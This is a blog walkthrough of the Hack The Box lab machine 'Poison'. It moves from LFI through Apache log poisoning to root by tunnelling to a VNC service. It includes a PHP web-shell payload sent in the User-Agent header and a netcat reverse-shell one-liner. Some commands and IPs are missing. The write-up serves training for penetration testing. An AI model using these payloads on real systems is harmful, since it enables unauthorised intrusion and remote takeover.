POISON -Hack The Box Walk through

Dhanishtha Awasthi
4 min readJul 21, 2020



nmap scan


Let’s fuzz

Also if you notice URL , LFI is possible

Cracking the password we found, by decoding it 13 times. First I was confused with rot13, but since this looked like a base64 hash, so I tried 13 times base64 decode.

SSH didn’t work, so I think LFI to Rce is the onme and only way

Checking http-error logs of apache24

capture on burp and send <system(id);?> in user-agent.

we see bad request. Let’s change request ,

changing payload to <?php system($_GET[‘cmd’]);?> in user-agent and sending the request.

It says cannot execute blank command, this is because we didn’t enter any command in url. Now we will request “id” in command.


Now is time to get shell. Using pentest monkeys amazing reverse shell cheatsheet

URL Encode:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

And sending the request

Let’s try to switch to charix with password we got


we see secret.zip let’s copy it to our machine

on victim machine

On your machine

I used charix’s passwd here, we got earlier. If it would not have worked , I would have done zip2john

Enumerating process

vnc running as root.

Enumerating network and ports listening on.

We see default port for VNC 5901 is used on localhost.

  1. Now we will do ssh tunneling such that connecting to our localhost at port 8081 , connects to poison’s localhost on port 5901

Now we connect to charix with dynamic port forwarded to 8081

Now we will connect to VNCviewer , using proxychains with passwd file secret. proxychains vncserver -passwd secret

root flag.

2. You can also do it using SSH port forwarding in following manner.

ssh -L 8081: charix@

then; vncserver -passwd secret

To root machine , run nc -nv 12345 and start netcat on your machine, so that you get root shell.

ROOTED!!! Not literally though.



Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.